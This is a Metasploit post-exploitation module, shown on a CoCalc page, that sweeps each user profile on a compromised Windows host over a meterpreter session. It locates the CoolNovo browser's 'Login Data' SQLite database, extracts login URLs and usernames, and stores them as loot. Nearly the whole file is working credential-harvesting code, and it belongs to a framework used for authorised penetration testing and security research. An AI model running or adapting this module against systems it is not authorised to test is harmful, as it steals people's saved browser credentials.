CoCalc -- coolnovo.rb

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/coolnovo.rb
²¹⁵⁵¹ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Windows::UserProfiles
9
  include Msf::Post::Windows::Packrat
10
  ARTIFACTS =
11
    {
12
      application: 'coolnovo',
13
      app_category: 'browsers',
14
      gatherable_artifacts: [
15
        {
16
          filetypes: 'logins',
17
          path: 'LocalAppData',
18
          dir: 'MapleStudio',
19
          artifact_file_name: 'Login Data',
20
          description: 'CoolNovo saved Username and Passwords',
21
          credential_type: 'sqlite',
22
          sql_search: [
23
            {
24
              sql_description: "Database Commands which exports Coolnovo's Login data",
25
              sql_table: 'logins',
26
              sql_column: 'action_url, username_value'
27
            }
28
          ]
29
        },
30
        {
31
          filetypes: 'logins',
32
          path: 'LocalAppData',
33
          dir: 'MapleStudio',
34
          artifact_file_name: 'Login Data',
35
          description: 'CoolNovo saved Username and Passwords',
36
          credential_type: 'sqlite',
37
          sql_search: [
38
            {
39
              sql_description: "Database Commands which exports Coolnovo's Login data",
40
              sql_table: 'logins',
41
              sql_column: 'action_url, username_value'
42
            }
43
          ]
44
        }
45

46
      ]
47
    }.freeze
48

49
  def initialize(info = {})
50
    super(
51
      update_info(
52
        info,
53
        'Name' => 'Coolnovo Credential Gatherer',
54
        'Description' => %q{
55
          This module searches for Coolnovo credentials on a Windows host.
56
        },
57
        'License' => MSF_LICENSE,
58
        'Author' => [
59
          'Kazuyoshi Maruta',
60
          'Daniel Hallsworth',
61
          'Barwar Salim M',
62
          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
63
        ],
64
        'Platform' => ['win'],
65
        'SessionTypes' => ['meterpreter'],
66
        'Notes' => {
67
          'Stability' => [CRASH_SAFE],
68
          'Reliability' => [],
69
          'SideEffects' => []
70
        }
71
      )
72
    )
73

74
    register_options(
75
      [
76
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
77
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
78
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
79
        # enumerates the options based on the artifacts that are defined below
80
        OptEnum.new('ARTIFACTS', [
81
          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
82
                                                          k[:filetypes]
83
                                                        end.uniq.unshift('All')
84
        ])
85
      ]
86
    )
87
  end
88

89
  def run
90
    print_status('Filtering based on these selections:  ')
91
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
92
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
93
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")
94

95
    # used to grab files for each user on the remote host
96
    grab_user_profiles.each do |userprofile|
97
      run_packrat(userprofile, ARTIFACTS)
98
    end
99

100
    print_status 'PackRat credential sweep completed'
101
  end
102
end
103

104
Product

Resources

Company
